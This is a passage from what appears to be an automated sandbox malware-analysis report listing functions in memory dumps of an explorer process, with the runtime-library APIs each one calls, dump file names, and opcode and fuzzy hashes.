                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0DF105ED
                                                                                                                                                                                                                          • Part of subcall function 0DF0E41C: malloc.LIBCMT ref: 0DF0E447
                                                                                                                                                                                                                          • Part of subcall function 0DF0E41C: Sleep.KERNEL32 ref: 0DF0E45A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DF106EE
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DF1070A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                        • Instruction ID: 5fac8376ac380a1e9dd9dc33dec894c00cae5ccaa1d97c10d0616e4a4506818a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F51A33A705B4093EB25EF5AE95072A77A4F788B94F44C2399F8D47B10DF38C4A68700
                                                                                                                                                                                                                        Function 0B0C05C4 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0B0C05ED
                                                                                                                                                                                                                          • Part of subcall function 0B0BE41C: malloc.LIBCMT ref: 0B0BE447
                                                                                                                                                                                                                          • Part of subcall function 0B0BE41C: Sleep.KERNEL32 ref: 0B0BE45A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B0C06EE
                                                                                                                                                                                                                        • free.LIBCMT ref: 0B0C070A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                        • Instruction ID: 8a557e522c348ee6aee7d2ff3e47e890be18d2601892a96193bb294f2b7be4a1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4351AD36705B4097EB28EF56E95079E73A4F788B98F5482299E9C07B10EF38C466C704
                                                                                                                                                                                                                        Function 00B68285 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00B682AB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 00B682A0
                                                                                                                                                                                                                          • Part of subcall function 00B5F4DD: _getptd_noexit.LIBCMT ref: 00B5F4E1
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B6832A
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 00B6833B
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00B68346
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction ID: f552dc2dfb554221b9d51e9f8fd878406962cac95652f8dae3bc536d3cc678e7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97413930514A1A8BDF64EB1984942B6B3E0FB54722B9407EEF8A6C7294EF2CC881D745
                                                                                                                                                                                                                        Function 02C08285 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 02C082AB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 02C082A0
                                                                                                                                                                                                                          • Part of subcall function 02BFF4DD: _getptd_noexit.LIBCMT ref: 02BFF4E1
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C0832A
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 02C0833B
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 02C08346
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction ID: a56ce3c620df705b7d255f868bcf1b7496fb8a28d40c915519e199a312cd5562
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF414A30514E1A8BCB64EB1984D42B6B3E1FBD4329F98876ED4DAC71D4EB38CA81D741
                                                                                                                                                                                                                        Function 0B9B8285 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B9B82AB
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B9B82A0
                                                                                                                                                                                                                          • Part of subcall function 0B9AF4DD: _getptd_noexit.LIBCMT ref: 0B9AF4E1
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B9B832A
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B9B833B
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B9B8346
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction ID: d561e9672b3074c64892d61c29349947567b001dff54758b394f2bc1829c5a64
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4417931914F1A8FCB64EB1985D4AF6B3E9FB88325B94062ED4A6C7194E628C481C782
                                                                                                                                                                                                                        Function 0DFF8AC4 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFF8AEF
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFF8AE4
                                                                                                                                                                                                                          • Part of subcall function 0DFEFBA8: _getptd_noexit.LIBCMT ref: 0DFEFBAC
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFF8B92
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFF8B9D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction ID: 807c06cef0ba3a9bb906abdee19b0282afa6b891ed3dd013a2de87f6c25a331e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 154136F2E0139586DF249B2A95506BD73A1FF40BD5F98C126EB996BBA4D738C581C300
                                                                                                                                                                                                                        Function 0DF18AC4 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DF18AEF
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DF18AE4
                                                                                                                                                                                                                          • Part of subcall function 0DF0FBA8: _getptd_noexit.LIBCMT ref: 0DF0FBAC
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DF18B92
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DF18B9D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction ID: d43f33f695137e9a1eac7f65adbcf67266d669d7ca4dbf4000ba1bef1d9e354c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B84125BAE0139596DF24DB2A96506BD7360F740BD5F98C126EFD917A84D738C141C700
                                                                                                                                                                                                                        Function 0B0C8AC4 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B0C8AEF
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B0C8AE4
                                                                                                                                                                                                                          • Part of subcall function 0B0BFBA8: _getptd_noexit.LIBCMT ref: 0B0BFBAC
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B0C8B92
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B0C8B9D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction ID: e00be240e41d927a83df79400cd1b894633047538d679f03db6e0232ceca693a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE4115B2A013958ADFAC9B2195906FF73E1F740BD5F88C11EDB9517A85DB38C151C308
                                                                                                                                                                                                                        Function 0DFF8950 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFF8976
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFF896B
                                                                                                                                                                                                                          • Part of subcall function 0DFEFBA8: _getptd_noexit.LIBCMT ref: 0DFEFBAC
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFF89F5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFF8A06
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFF8A11
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction ID: dd6eb9578b6d1c7f7dda852798f73912b79ee1ceb73e1b4e3f8e441039a48641
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB3117B3E142A682DF34AB1A94502BD77A0FF40FE5F94C126EBD41BAA4E728C951C710
                                                                                                                                                                                                                        Function 0DF18950 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DF18976
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DF1896B
                                                                                                                                                                                                                          • Part of subcall function 0DF0FBA8: _getptd_noexit.LIBCMT ref: 0DF0FBAC
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DF189F5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DF18A06
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DF18A11
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction ID: 7962781d01c65ff4ee1814e14de7d6520ade667bfa1609f89be651644728ac42
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99318E7AE142A6A3DF24AB1E96502BD7760F740FE4FD4C12AEBD40BA84D738C555C710
                                                                                                                                                                                                                        Function 0B0C8950 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B0C8976
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B0C896B
                                                                                                                                                                                                                          • Part of subcall function 0B0BFBA8: _getptd_noexit.LIBCMT ref: 0B0BFBAC
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B0C89F5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B0C8A06
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B0C8A11
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction ID: 602439767840777a37ce74dddadb2b70fbb272e4b95d537fb71b51e8e7206f28
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33312B72A143A586EF6C9B12D4512FF73E1E750BA5F88C22ED7D907A84DB38C551C708
                                                                                                                                                                                                                        Function 00B613F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 00B6141B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 00B614A5
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 00B613F8
                                                                                                                                                                                                                          • Part of subcall function 00B5F265: _getptd_noexit.LIBCMT ref: 00B5F26B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 00B614AA
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 00B614B6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction ID: ad5d666aaea85a0549843f55c53b2fe42a24e85f796feca3b09c7b5fa2f30982
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20318E35218B058FC764EF5CC442B69B3E1FF98321F15499DE48A83356DB35E846CB82
                                                                                                                                                                                                                        Function 02C013F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 02C0141B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 02C014A5
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 02C013F8
                                                                                                                                                                                                                          • Part of subcall function 02BFF265: _getptd_noexit.LIBCMT ref: 02BFF26B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 02C014AA
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 02C014B6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction ID: 09d6b71d8f4154e61c6ffd2898d15303e6a5b96e6c67285c1b125432a423a884
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93318B34218B048FC768EF98C481B69B3E2FB98324F55455DD4CEC36A1DB71E946CB82
                                                                                                                                                                                                                        Function 0B9B13F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0B9B141B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0B9B14A5
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B9B13F8
                                                                                                                                                                                                                          • Part of subcall function 0B9AF265: _getptd_noexit.LIBCMT ref: 0B9AF26B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B9B14AA
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B9B14B6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$DestructExceptionObject$_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1546832303-1018135373
                                                                                                                                                                                                                        • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction ID: 17523361d43ef7312e1989e04cb6494a46e98c9ece6dbc32cea5b7b283299b34
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D31A034628B048FC768EF18C492BAAB3E1FF98324F11455DD48AD3251DB31F846CB82
                                                                                                                                                                                                                        Function 0DFE4F60 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFE4FBF
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: EnterCriticalSection.KERNEL32 ref: 0DFD9248
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: RtlInitializeCriticalSection.NTDLL ref: 0DFD9255
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcpyA.KERNEL32 ref: 0DFD928A
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcpyA.KERNEL32 ref: 0DFD92AD
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcatA.KERNEL32 ref: 0DFD92BD
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrcatA.KERNEL32 ref: 0DFD92CD
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: LeaveCriticalSection.KERNEL32 ref: 0DFD9354
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: memcpy.MSVCRT ref: 0DFD936C
                                                                                                                                                                                                                          • Part of subcall function 0DFD9200: lstrlenA.KERNEL32 ref: 0DFD937A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0DFE4FE6
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFE505A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DFE5065
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
